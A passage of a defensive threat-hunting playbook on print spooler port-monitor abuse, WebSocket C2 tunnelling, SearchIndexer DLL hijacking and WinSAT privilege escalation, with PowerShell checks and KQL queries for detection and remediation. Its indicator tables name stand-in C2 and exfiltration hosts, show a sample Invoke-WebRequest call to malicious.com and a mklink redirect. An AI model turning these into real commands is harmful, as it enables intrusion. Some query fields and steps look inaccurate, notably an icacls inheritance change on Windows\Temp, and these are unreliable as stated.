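    if ([IO.Path]::IsPathRooted($Driver)) { return $Driver }
    return Join-Path $System32 $Driver
}

function Get-PortMonitorFindings {
    param([string]$Key = $MonitorsKey)
    # Snapshot of modules mapped into the spooler; empty if it is not running
    # or we lack the rights to inspect it.
    $loaded = @()
    try { $loaded = @((Get-Process -Name spoolsv -ErrorAction Stop).Modules.FileName) } catch { }

    Get-ChildItem -Path $Key -ErrorAction SilentlyContinue | ForEach-Object {
        $driver  = (Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue).Driver
        $dll     = Resolve-MonitorDll $driver
        $status  = 'n/a'; $signer = $null; $reasons = @()
        if (-not $dll) {
            $reasons += 'no Driver value'
        } elseif (-not (Test-Path -LiteralPath $dll)) {
            $status   = 'NotFound'
            $reasons += 'DLL missing on disk'
        } else {
            # Catalog-signed Windows DLLs report Valid with a Microsoft subject.
            $sig    = Get-AuthenticodeSignature -LiteralPath $dll
            $status = $sig.Status
            $signer = $sig.SignerCertificate.Subject
            if ($status -ne 'Valid')               { $reasons += "signature $status" }
            elseif ($signer -notmatch 'Microsoft') { $reasons += 'not Microsoft-signed' }
        }
        if ($dll -and -not $dll.StartsWith($System32, 'OrdinalIgnoreCase')) { $reasons += 'DLL outside System32' }
        [pscustomobject]@{
            Monitor   = $_.PSChildName
            Driver    = $driver
            Path      = $dll
            Signature = $status
            Signer    = $signer
            Loaded    = [bool]($dll -and ($loaded -contains $dll))
            Verdict   = if ($reasons) { 'SUSPICIOUS: ' + ($reasons -join '; ') } else { 'baseline' }
        }
    }
}

Get-PortMonitorFindings | Format-Table Monitor, Driver, Signature, Loaded, Verdict -AutoSize -Wrap
```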
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect Port Monitor Modifications
DeviceRegistryEvents
| where RegistryKey contains "SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors"
| where RegistryValueName == "Driver"
| where RegistryValueData contains "Temp" or RegistryValueData contains "Public"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, InitiatingProcessAccountName
🕵️ Identify Suspicious DLLs Loaded by Spooler Service
DeviceFileEvents
| where InitiatingProcessFileName == "spoolsv.exe"
| where FileName endswith ".dll"
| where FolderPath contains "Temp" or FolderPath contains "Public"
| project Timestamp, DeviceName, FolderPath, FileName, InitiatingProcessAccountName
🕵️ Monitor Registry Changes in Port Monitors
DeviceRegistryEvents
| where RegistryKey contains "Print\\Monitors"
| where ActionType == "RegistryValueSet"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, InitiatingProcessAccountName
🕵️ Trace DLL Execution via Print Spooler
DeviceImageLoadEvents
| where InitiatingProcessFileName == "spoolsv.exe"
| where FileName endswith ".dll"
| project Timestamp, DeviceName, FileName, FolderPath, InitiatingProcessAccountName
🕵️ Identify Unauthorized Port Monitor Additions
DeviceRegistryEvents
| where RegistryKey contains "Print\\Monitors"
| where RegistryValueName == "Driver"
| where RegistryValueData !contains "System32"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, InitiatingProcessAccountName
📊 Event Viewer Logs
Event ID | Description
4688 | New process created (spoolsv.exe).
4663 | Registry key access detected (Print\Monitors).
7045 | A new service was installed.
7036 | Print Spooler service state change.
📌 Focus on Event ID 4663:
Look for:
RegistryKey: HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors
📌 Focus on Event ID 7045:
A new DLL/service is loaded into Print Spooler:
ServiceName: Spooler
BinaryPath: C:\Windows\Temp\malicious.dll
🕵️ 3. Investigation Techniques
1️⃣ Verify Port Monitor DLL Integrity
Get-FileHash -Path "C:\Windows\Temp\malicious.dll"
Compare hash on VirusTotal.
2️⃣ Check Loaded DLLs in Spooler Process
(Get-Process spoolsv).Modules | Where-Object { $_.FileName -like "*.dll" }
3️⃣ Analyze Registry Modifications
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors"
🔧 4. Remediation Steps
📌 1. Remove Malicious Port Monitor Entries
Remove-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors\MaliciousMonitor" -Recurse
📌 2. Restart Print Spooler Service
Stop-Service -Name Spooler -Force
Start-Service -Name Spooler
📌 3. Remove Suspicious DLLs
Remove-Item -Path "C:\Windows\Temp\malicious.dll" -Force
📌 4. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScan
🛡️ 5. Prevention Steps
Monitor Registry Changes: Enable auditing for Print\Monitors keys.
Restrict Registry Access: Limit administrative access to Port Monitor keys.
Monitor Print Spooler Activity: Regularly review spoolsv.exe behavior.
Implement EDR Rules: Detect unauthorized Port Monitor additions.
Review Event Logs Regularly: Focus on 4688, 4663, 7045.
🧠 6. Key Takeaways
Focus on Registry Keys: Print\Monitors for unauthorized DLLs.
Monitor Event IDs: 4688, 4663, 7045.
Trace Suspicious Processes: Any non-system DLLs loaded by spoolsv.exe.
Regular Audits: Ensure no unauthorized registry modifications exist.
🚨 Potential Tunneled Communication via WebSocket Connection: Advanced Threat Analysis
🔍 1. Attack Breakdown
📝 What is WebSocket?
WebSocket is a communication protocol that provides full-duplex communication channels over a single TCP connection.
It is commonly used for:
Real-time applications: Chat apps, stock trading platforms, etc.
Low-latency connections: For persistent client-server connections.
📑 Why Do Attackers Use WebSocket for Tunneling?
Evasion: Traffic looks like legitimate application communication.
Persistence: Persistent connection for long-term access.
Stealth: Harder to detect due to encryption and regular WebSocket behavior.
Data Exfiltration: Data can be extracted via WebSocket frames.
Command and Control (C2): Establish persistent backdoor communications.
📌 Common Attack Scenarios
Technique | Description | Example Indicator
WebSocket C2 Channel | Malicious C2 server over WebSocket. | ws://malicious.com/c2
Data Exfiltration via WebSocket | Extract data via WebSocket frames. | wss://attacker.com/exfil
WebSocket Beaconing | Regular communication to avoid detection. | ws://hidden-server.com:8080
Fileless Malware Execution | Execute commands via WebSocket without dropping files. | ws://attack.com/command
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ List Active WebSocket Connections
Get-NetTCPConnection | Where-Object { $_.RemotePort -eq 80 -or $_.RemotePort -eq 443 } | Format-Table
🕵️ Check Processes with Active WebSocket Communication
Get-Process | Where-Object { $_.Modules.ModuleName -match "websocket" } | Select-Object Id, ProcessName, Path
🕵️ Inspect Suspicious PowerShell Processes
Get-EventLog -LogName Security | Where-Object { $_.Message -like "*powershell*" -and $_.Message -like "*Invoke-WebRequest*" }
🕵️ Check for Suspicious Outbound WebSocket Communication
netstat -ano | findstr ":80 :443"
🕵️ Identify Processes Using WebSocket Libraries
Get-ChildItem -Path "C:\Windows\System32" -Recurse -Include *.dll | Where-Object { $_.Name -like "*websocket*" }
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect WebSocket Communication by Suspicious Processes
DeviceNetworkEvents
| where RemotePort in (80, 443)
| where Protocol == "WebSocket"
| where InitiatingProcessFileName in ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
| project Timestamp, DeviceName, RemoteIP, RemotePort, InitiatingProcessCommandLine, InitiatingProcessAccountName
🕵️ Identify WebSocket Communication to Unusual Domains/IPs
DeviceNetworkEvents
| where Protocol == "WebSocket"
| where RemoteUrl contains ".onion" or RemoteIP != "127.0.0.1"
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, InitiatingProcessAccountName
🕵️ Trace Beaconing Patterns over WebSocket
DeviceNetworkEvents
| where Protocol == "WebSocket"
| summarize Hits = count() by RemoteIP, RemoteUrl, DeviceName
| where Hits > 10
| order by Hits desc
🕵️ Monitor Outbound WebSocket Traffic to Suspicious Hosts
DeviceNetworkEvents
| where Protocol == "WebSocket"
| where RemoteIP in ("192.168.1.100", "10.10.10.10")
| project Timestamp, DeviceName, RemoteIP, InitiatingProcessCommandLine, InitiatingProcessAccountName
🕵️ Detect Encoded Commands in WebSocket Frames
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine contains "-EncodedCommand"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
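The beaconing query above counts connections per destination; a count alone does not separate a check-in loop from a busy browser tab. The added example below (not the playbook's own code) scores the regularity of the gaps between connections instead. It assumes records with Timestamp, RemoteIP and Process fields, which is how rows exported from the hunting query or parsed from Event ID 5156 would look; the sample records and the jitter threshold are constructed for illustration.

```powershell
# Added example (not part of the original playbook): flag destinations whose
# connection gaps are metronome-like, the signature of a beacon.
function Get-BeaconCandidates {
    param(
        [Parameter(Mandatory)][object[]]$Connections,
        [int]$MinHits = 10,        # fewer connections than this is not enough evidence
        [double]$MaxJitter = 0.15  # std-dev / mean of the gaps; assumption, tune per environment
    )
    $Connections | Group-Object RemoteIP, Process | ForEach-Object {
        $times = $_.Group.Timestamp | Sort-Object
        if ($times.Count -lt $MinHits) { return }
        # Gaps between consecutive connections, in seconds.
        $gaps = for ($i = 1; $i -lt $times.Count; $i++) { ($times[$i] - $times[$i - 1]).TotalSeconds }
        $mean = ($gaps | Measure-Object -Average).Average
        $var  = ($gaps | ForEach-Object { ($_ - $mean) * ($_ - $mean) } | Measure-Object -Average).Average
        # Coefficient of variation: near 0 for a fixed sleep, large for human-driven traffic.
        $jitter = if ($mean -gt 0) { [math]::Sqrt($var) / $mean } else { 0 }
        [pscustomobject]@{
            RemoteIP   = $_.Group[0].RemoteIP
            Process    = $_.Group[0].Process
            Hits       = $times.Count
            MeanGapSec = [math]::Round($mean, 1)
            Jitter     = [math]::Round($jitter, 3)
            Beacon     = ($jitter -le $MaxJitter)
        }
    }
}

# Constructed sample: one process checking in every 60 s (+/- 2 s) to 203.0.113.10,
# one browser talking irregularly to 198.51.100.20. Addresses are documentation ranges.
$start  = Get-Date '2024-01-01T09:00:00'
$rng    = [System.Random]::new(7)
$sample = @()
for ($i = 0; $i -lt 12; $i++) {
    $sample += [pscustomobject]@{ Timestamp = $start.AddSeconds(60 * $i + $rng.Next(-2, 3)); RemoteIP = '203.0.113.10'; Process = 'powershell.exe' }
}
foreach ($offset in 0, 15, 16, 90, 400, 401, 402, 900, 1500, 1501, 2600, 2601) {
    $sample += [pscustomobject]@{ Timestamp = $start.AddSeconds($offset); RemoteIP = '198.51.100.20'; Process = 'msedge.exe' }
}
Get-BeaconCandidates -Connections $sample | Format-Table -AutoSize
```

Real beacons often add deliberate jitter, so treat the threshold as a starting point and combine the score with the destination reputation and parent-process checks elsewhere in this section.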
📊 Event Viewer Logs
Event ID | Description
4688 | New process created (powershell.exe, cmd.exe).
5156 | Network connection allowed.
4663 | Object access attempt.
4104 | PowerShell script block execution.
📌 Focus on Event ID 4688:
Look for:
ProcessCommandLine: powershell.exe -c "Invoke-WebRequest ws://malicious.com"
ParentProcessName: explorer.exe
📌 Focus on Event ID 5156:
Identify outbound WebSocket connections:
RemoteAddress: malicious.com
Port: 80/443
🕵️ 3. Investigation Techniques
1️⃣ Inspect WebSocket Connections
netstat -anob | findstr "80 443"
2️⃣ Trace WebSocket Processes
Get-Process -Id <PID>
3️⃣ Analyze Traffic Logs
Use Wireshark or Tshark:
tshark -Y "websocket"
🔧 4. Remediation Steps
📌 1. Terminate Suspicious Processes
Stop-Process -Id <PID> -Force
📌 2. Block Malicious IPs or Domains
New-NetFirewallRule -DisplayName "Block Malicious IP" -Direction Outbound -RemoteAddress <IP> -Action Block
📌 3. Inspect Configuration Files
Review AppData, Temp, and startup locations.
📌 4. Clear DNS Cache
Clear-DnsClientCache
📌 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScan
🛡️ 5. Prevention Steps
Enable WebSocket Monitoring: Ensure SIEM monitors WebSocket connections.
Restrict PowerShell Execution Policies: Apply restrictive PowerShell policies.
Enable Command Line Auditing: Capture ws:// and wss:// usage.
Monitor Beaconing Patterns: Use behavioral analytics to detect periodic communication.
User Education: Train staff to recognize malicious URLs.
🧠 6. Key Takeaways
Monitor WebSocket Traffic: Especially outbound connections on port 80/443.
Focus on Event IDs: 4688, 5156, 4104.
Identify Parent-Child Anomalies: Unusual PowerShell execution with ws://.
🚨 Unusual DLL Load by Indexer
🔍 1. Attack Breakdown
📝 What is the Windows Indexer (SearchIndexer.exe)?
SearchIndexer.exe is a legitimate Windows process responsible for indexing files and folders to enable fast searches on the system. It is located in:
C:\Windows\System32\SearchIndexer.exe
The process interacts with various DLL files to perform indexing tasks.
📑 Why Do Attackers Target SearchIndexer.exe?
Trusted Binary: Signed by Microsoft and often ignored by security tools.
Living Off the Land (LotL): Abuse legitimate processes to avoid detection.
Stealth: DLL injection hides malicious activity under a legitimate process.
Persistence: Loaded DLLs can maintain persistence across reboots.
Privilege Escalation: Exploit misconfigurations for elevated privileges.
📌 Common Attack Scenarios
Technique | Description | Example Indicator
DLL Side-Loading | Place a malicious DLL in a directory indexed by SearchIndexer.exe. | C:\Windows\Temp\malicious.dll
DLL Hijacking | Replace or hijack legitimate DLLs. | C:\Windows\System32\legit.dll → malicious.dll
Persistence via Registry Key | Set SearchIndexer.exe to load malicious DLLs. | HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Reflective DLL Injection | Inject a DLL directly into SearchIndexer.exe. | rundll32.exe malicious.dll
Code Execution via DLL Proxying | Redirect legitimate DLL calls to malicious payloads. | C:\Users\Public\fake.dll
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ List Loaded DLLs by SearchIndexer
Get-Process -Name SearchIndexer | Select-Object -ExpandProperty Modules | Select-Object FileName
✅ Expected Directories: C:\Windows\System32\
❌ Suspicious Directories: C:\Temp\, C:\Users\Public\
🕵️ Identify DLLs Recently Loaded by SearchIndexer
Get-EventLog -LogName Security | Where-Object { $_.Message -like "*SearchIndexer.exe*" -and $_.Message -like "*.dll*" }
🕵️ Inspect Parent-Child Relationship
Get-CimInstance Win32_Process | Where-Object { $_.Name -eq "SearchIndexer.exe" } | Select-Object ProcessId, ParentProcessId, CommandLine
✅ Expected Parent: services.exe
❌ Unexpected Parent: cmd.exe, powershell.exe
🕵️ Check DLLs in Suspicious Paths
Get-ChildItem -Path "C:\Windows\Temp", "C:\Users\Public" -Filter "*.dll" -Recurse
🕵️ Check for Suspicious DLL Registry Entries
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SearchIndexer.exe"
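The module listing and parent check above are two separate one-liners; the added example below (not the playbook's own code) joins them: for each instance of a named process it reports every loaded module outside the trusted roots with its signature status, together with the full parent chain so an unexpected launcher stands out. SearchIndexer is the default, but the same function applies to any process discussed on this page, WinSAT.exe included; the trusted-root list is an assumption to tune per build.

```powershell
# Added example (not part of the original playbook): untrusted modules plus
# ancestry for a process. Run elevated; SYSTEM processes hide their modules otherwise.
function Get-ProcessAncestry {
    # Returns "SearchIndexer.exe(1234) <- services.exe(700) <- wininit.exe(600)" via CIM.
    param([int]$ProcessId)
    $chain = @()
    $seen  = @{}   # guards against PID reuse producing a cycle
    $cur = Get-CimInstance Win32_Process -Filter "ProcessId = $ProcessId"
    while ($cur -and -not $seen.ContainsKey($cur.ProcessId)) {
        $seen[$cur.ProcessId] = $true
        $chain += "$($cur.Name)($($cur.ProcessId))"
        $cur = Get-CimInstance Win32_Process -Filter "ProcessId = $($cur.ParentProcessId)"
    }
    return ($chain -join ' <- ')
}

function Get-UntrustedModules {
    param(
        [string]$Name = 'SearchIndexer',
        # Assumption: stock Windows code lives under these roots on this build.
        [string[]]$TrustedRoots = @("$env:SystemRoot\System32", "$env:SystemRoot\WinSxS")
    )
    foreach ($proc in Get-Process -Name $Name -ErrorAction SilentlyContinue) {
        $ancestry = Get-ProcessAncestry -ProcessId $proc.Id
        $modules  = try { $proc.Modules } catch { Write-Warning "Cannot read modules of PID $($proc.Id): $_"; @() }
        foreach ($m in $modules) {
            $trusted = $false
            foreach ($root in $TrustedRoots) {
                if ($m.FileName.StartsWith($root, 'OrdinalIgnoreCase')) { $trusted = $true; break }
            }
            if ($trusted) { continue }   # System32/WinSxS modules are the expected case
            $sig = Get-AuthenticodeSignature -LiteralPath $m.FileName
            [pscustomobject]@{
                Process   = "$($proc.Name)($($proc.Id))"
                Module    = $m.FileName
                Signature = $sig.Status
                Signer    = $sig.SignerCertificate.Subject
                Ancestry  = $ancestry
            }
        }
    }
}

Get-UntrustedModules | Format-Table -AutoSize -Wrap
```

An empty result means every module came from a trusted root; the Ancestry column is still worth a glance, since a clean module list launched from cmd.exe or powershell.exe is the parent-child anomaly this section describes.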
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect Unusual DLL Loaded by SearchIndexer
DeviceImageLoadEvents
| where InitiatingProcessFileName == "SearchIndexer.exe"
| where FolderPath !startswith "C:\\Windows\\System32"
| project Timestamp, DeviceName, FileName, FolderPath, InitiatingProcessCommandLine, InitiatingProcessAccountName
🕵️ Trace Suspicious DLL Load Attempts
DeviceFileEvents
| where InitiatingProcessFileName == "SearchIndexer.exe"
| where FileName endswith ".dll"
| where FolderPath contains "Temp" or FolderPath contains "Public"
| project Timestamp, DeviceName, FileName, FolderPath, InitiatingProcessAccountName
🕵️ Identify Registry Persistence via DLL Load
DeviceRegistryEvents
| where RegistryKey contains "Image File Execution Options"
| where RegistryValueData contains "SearchIndexer.exe"
| where RegistryValueData contains ".dll"
| project Timestamp, DeviceName, RegistryKey, RegistryValueData, InitiatingProcessAccountName
🕵️ Trace DLL Side-Loading Behavior
DeviceImageLoadEvents
| where FileName endswith ".dll"
| where FolderPath contains "Temp" or FolderPath contains "Public"
| project Timestamp, DeviceName, FileName, FolderPath, InitiatingProcessAccountName
📊 Event Viewer Logs
Event ID | Description
4688 | A new process was created (SearchIndexer.exe).
4663 | Object access attempt (e.g., DLL access).
7036 | Service state changed.
7045 | A new service was installed.
📌 Focus on Event ID 4688:
Look for:
ProcessCommandLine: SearchIndexer.exe C:\Temp\malicious.dll
ParentProcessName: services.exe
📌 Focus on Event ID 4663:
Registry key access:
RegistryKey: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
🕵️ 3. Investigation Techniques
1️⃣ Validate DLL Hashes
Get-FileHash -Path "C:\Temp\malicious.dll"
Compare hash on VirusTotal.
2️⃣ Trace Parent-Child Relationships
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq <PID> }
3️⃣ Review Recent File Changes
Get-ChildItem -Path "C:\Temp", "C:\Users\Public" -Recurse | Sort-Object LastWriteTime -Descending
🔧 4. Remediation Steps
📌 1. Terminate Malicious Processes
Stop-Process -Id <PID> -Force
📌 2. Remove Malicious DLL Files
Remove-Item -Path "C:\Temp\malicious.dll" -Force
📌 3. Remove Malicious Registry Entries
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SearchIndexer.exe" -Name "Debugger"
📌 4. Restart Search Indexer Service
Restart-Service -Name WSearch
📌 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScan
🛡️ 5. Prevention Steps
Monitor DLL Loading Paths: Restrict DLL loading from non-standard locations.
Enable Command Line Auditing: Track unusual execution arguments.
Restrict Registry Access: Limit access to Image File Execution Options.
Monitor Event Logs: Focus on 4688, 4663, 7045.
Enable Behavioral Analytics: Use EDR tools to detect anomalies.
🧠 6. Key Takeaways
Focus on DLL Paths: Validate SearchIndexer.exe DLL paths.
Monitor Event IDs: 4688, 4663, 7045.
Parent-Child Analysis: Validate services.exe as the parent process.
🚨 WinSAT Bypass – Privilege Escalation via File Change: Advanced Threat Analysis
🔍 1. Attack Breakdown
📝 What is WinSAT.exe?
WinSAT.exe (Windows System Assessment Tool) is a legitimate Windows tool used to assess system performance and capabilities. It is located at:
C:\Windows\System32\WinSAT.exe
It typically runs with elevated privileges, making it a target for privilege escalation attacks.
📑 Why Do Attackers Target WinSAT.exe?
Trusted Binary: Signed by Microsoft and trusted by security tools.
Privilege Escalation: Runs with SYSTEM-level privileges.
Abuse DLL Search Order Hijacking: Loads DLLs from insecure paths.
File Change Vulnerability: Can be manipulated to execute arbitrary code.
Living Off the Land (LotL): Utilizes built-in tools to avoid detection.
📌 Common Attack Scenarios
Technique | Description | Example Indicator
DLL Hijacking | Place a malicious DLL in System32 or another search path. | C:\Windows\Temp\malicious.dll
File Change in Insecure Paths | Modify files loaded by WinSAT.exe. | C:\Temp\legit.dll → malicious.dll
Symlink Attack | Point critical files to attacker-controlled files. | mklink C:\Windows\Temp\config.ini C:\Malicious\config.ini
Hijack WinSAT Execution Flow | Abuse WinSAT execution flow to run malicious code. | winsat.exe disk -drive c:
🛡️ 2. Detection Techniques
📊 Manual Inspection with PowerShell
🕵️ Check WinSAT Execution History in Security Logs
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -like "*winsat.exe*" }
🕵️ List All DLLs Loaded by WinSAT
Get-Process -Name WinSAT | Select-Object -ExpandProperty Modules | Select-Object FileName
✅ Expected Path: C:\Windows\System32\
❌ Suspicious Paths: C:\Temp\, C:\Users\Public\
🕵️ Check for Modified DLLs in System Directories
Get-ChildItem -Path "C:\Windows\System32", "C:\Temp" -Filter "*.dll" -Recurse | Sort-Object LastWriteTime -Descending
🕵️ Trace Parent-Child Relationship for WinSAT
Get-CimInstance Win32_Process | Where-Object { $_.Name -eq "winsat.exe" } | Select-Object ProcessId, ParentProcessId, CommandLine
✅ Expected Parent: services.exe
❌ Unexpected Parent: cmd.exe, powershell.exe
🕵️ Check for Symlink Exploitation
Get-ChildItem -Path "C:\Windows\Temp" -Recurse | Where-Object { $_.Attributes -match "ReparsePoint" }
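The reparse-point check above tells you that a link exists but not where it leads. The added example below (not the playbook's own code) resolves each symbolic link or junction under a writable directory and flags those whose target lies outside the trusted roots, which is the shape of the mklink scenario in the table. The scan paths and trusted roots are assumptions to adjust.

```powershell
# Added example (not part of the original playbook): find links in writable
# directories that redirect privileged readers such as WinSAT.exe elsewhere.
function Get-RedirectedLinks {
    param(
        [string[]]$ScanPath     = @("$env:SystemRoot\Temp"),                 # assumption: writable dir to scan
        [string[]]$TrustedRoots = @("$env:SystemRoot", "$env:ProgramFiles")  # assumption: acceptable targets
    )
    foreach ($root in $ScanPath) {
        Get-ChildItem -LiteralPath $root -Recurse -Force -ErrorAction SilentlyContinue |
            Where-Object { $_.Attributes.HasFlag([IO.FileAttributes]::ReparsePoint) } |
            ForEach-Object {
                # Target is a string in PowerShell 7 and a string[] in 5.1; take the first entry.
                $raw = @($_.Target) | Select-Object -First 1
                if (-not $raw) { return }   # other reparse kinds (cloud placeholders, dedup) have no link target
                # Symbolic links may be relative, so resolve against the link's own directory.
                $parent = Split-Path -LiteralPath $_.FullName -Parent
                $target = [IO.Path]::GetFullPath([IO.Path]::Combine($parent, $raw))
                $inside = $false
                foreach ($t in $TrustedRoots) {
                    if ($target.StartsWith($t, 'OrdinalIgnoreCase')) { $inside = $true; break }
                }
                [pscustomobject]@{
                    Link     = $_.FullName
                    LinkType = $_.LinkType
                    Target   = $target
                    Verdict  = if ($inside) { 'inside trusted root' } else { 'SUSPICIOUS: points outside trusted roots' }
                }
            }
    }
}

Get-RedirectedLinks | Format-Table -AutoSize -Wrap
```

A link inside a trusted root can still be abused (for example, redirecting a config file to a different trusted binary), so treat "inside trusted root" as lower priority rather than benign.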
📊 Microsoft Defender for Endpoint (MDE) Query (KQL)
🕵️ Detect WinSAT Executed from Suspicious Paths
DeviceProcessEvents
| where FileName == "winsat.exe"
| where FolderPath !startswith "C:\\Windows\\System32"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
🕵️ Trace DLLs Loaded by WinSAT
DeviceImageLoadEvents
| where InitiatingProcessFileName == "winsat.exe"
| where FolderPath !startswith "C:\\Windows\\System32"
| project Timestamp, DeviceName, FileName, FolderPath, InitiatingProcessCommandLine, InitiatingProcessAccountName
🕵️ Identify File Modifications by WinSAT
DeviceFileEvents
| where InitiatingProcessFileName == "winsat.exe"
| where ActionType == "FileModified"
| where FolderPath contains "Temp"
| project Timestamp, DeviceName, FileName, FolderPath, InitiatingProcessAccountName
🕵️ Trace Parent Processes for WinSAT
DeviceProcessEvents
| where FileName == "winsat.exe"
| where InitiatingProcessFileName != "services.exe"
| project Timestamp, DeviceName, InitiatingProcessFileName, ProcessCommandLine, AccountName
🕵️ Detect Symlink Attacks
DeviceFileEvents
| where FolderPath contains "Temp"
| where ActionType == "FileModified"
| where FileName contains ".lnk"
| project Timestamp, DeviceName, FileName, FolderPath, InitiatingProcessAccountName
📊 Event Viewer Logs
Event ID | Description
4688 | New process created (WinSAT.exe).
4663 | Object access attempt (e.g., DLL access).
7045 | A new service was installed.
5145 | A network share object was accessed.
📌 Focus on Event ID 4688:
Look for:
ProcessCommandLine: WinSAT.exe C:\Temp\malicious.dll
ParentProcessName: cmd.exe
📌 Focus on Event ID 4663:
Registry or file access:
RegistryKey: HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
🕵️ 3. Investigation Techniques
1️⃣ Validate DLL Hashes
Get-FileHash -Path "C:\Temp\malicious.dll"
Compare hash on VirusTotal.
2️⃣ Inspect WinSAT Configurations
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winsat.exe"
3️⃣ Check Symlinks in Temp Directory
fsutil reparsepoint query "C:\Windows\Temp"
🔧 4. Remediation Steps
📌 1. Terminate Malicious WinSAT Processes
Stop-Process -Name WinSAT -Force
📌 2. Remove Malicious DLL Files
Remove-Item -Path "C:\Temp\malicious.dll" -Force
📌 3. Remove Malicious Registry Entries
Remove-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe" -Name "Debugger"
📌 4. Reset Permissions on Critical Directories
icacls "C:\Windows\Temp" /inheritance:r
📌 5. Perform Full Antivirus Scan
Start-MpScan -ScanType FullScan
🛡️ 5. Prevention Steps
Enable Command Line Auditing: Monitor WinSAT.exe executions.
Restrict DLL Search Paths: Prevent loading DLLs from untrusted locations.
Monitor Registry Keys: Image File Execution Options.
Enable Behavioral Analytics: Detect unusual parent-child processes.
Restrict Write Access: Limit access to System32 and Temp.
🧠 6. Key Takeaways
Validate DLL Paths: Ensure DLLs used by WinSAT.exe are from trusted locations.
Focus on Event IDs: 4688, 4663, 7045.
Trace Parent-Child Relationships: Validate services.exe as the parent process.